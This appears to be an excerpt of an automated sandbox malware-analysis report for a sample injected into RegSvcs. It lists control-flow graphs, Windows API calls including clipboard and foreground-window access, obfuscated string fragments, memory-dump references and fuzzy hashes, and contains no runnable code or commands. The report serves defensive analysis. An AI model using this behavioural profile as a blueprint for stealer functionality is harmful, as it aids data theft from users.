                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 004406A2
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 004406B1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                  • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                                                                                  • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 122 43aa74-43aa9a call 441c60 125 43aa9e-43aaab call 413e40 * 2 122->125 126 43aa9c 122->126 131 43aaaf-43aad4 GetUserDefaultUILanguage 125->131 132 43aaad 125->132 126->125 133 43aad6-43aad9 131->133 132->131 134 43aadb-43aafb 133->134 135 43aafd-43ab29 133->135 134->133
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 95929093-0
                                                                                                                                                                                                  • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                                                                                  • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 136 440260-440271 137 4402a5-4402a6 call 43e860 136->137 138 440286-440298 call 441860 RtlReAllocateHeap 136->138 139 4402c0 136->139 140 4402c2 136->140 141 440278-44027f 136->141 142 44029a-4402a3 call 43e840 136->142 149 4402ab-4402b3 137->149 146 4402c4-4402c6 138->146 139->140 140->146 141->137 141->138 141->139 141->140 142->146 149->139
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                  • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                                                                                  • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 150 43e860-43e86c 151 43e873-43e889 call 441860 RtlFreeHeap 150->151 152 43e892-43e893 150->152 151->152
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                  • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                                                                                  • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 156 43e840-43e857 call 441860 RtlAllocateHeap
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                  • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                                                                                  • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                  • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                                                                                                                                                                  • API String ID: 237503144-2105826625
                                                                                                                                                                                                  • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                                                                                  • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$DeleteMetricsSelectSystem
                                                                                                                                                                                                  • String ID: $AnC$phC
                                                                                                                                                                                                  • API String ID: 3911056724-4014303587
                                                                                                                                                                                                  • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                                                                                  • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
                                                                                                                                                                                                  • API String ID: 0-709081256
                                                                                                                                                                                                  • Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                                                                                  • Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                  • String ID: =jh$D6v4$}z
                                                                                                                                                                                                  • API String ID: 237503144-2424248051
                                                                                                                                                                                                  • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                                                                                  • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                  • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                                                                                  • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: AtP$GpFv$LH
                                                                                                                                                                                                  • API String ID: 0-40351562
                                                                                                                                                                                                  • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                                                                                  • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                                                                                                                                                                    • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                                                                                                                                                                    • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                                                                                                                                                                    • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                                                                                                                                                                    • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                                                                                                                                                                    • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0040D6A0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                                                                                                                                                  • String ID: ;d$SD$TC03$^_/C
                                                                                                                                                                                                  • API String ID: 1556769885-3729532250
                                                                                                                                                                                                  • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                                                                                  • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                  • String ID: ~
                                                                                                                                                                                                  • API String ID: 237503144-2894255414
                                                                                                                                                                                                  • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                                                                                  • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                  • String ID: 0=$0=$ER$P&
                                                                                                                                                                                                  • API String ID: 237503144-76498936
                                                                                                                                                                                                  • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                                                                                  • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                  • String ID: i.
                                                                                                                                                                                                  • API String ID: 2538663250-1725878519
                                                                                                                                                                                                  • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                                                                                  • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7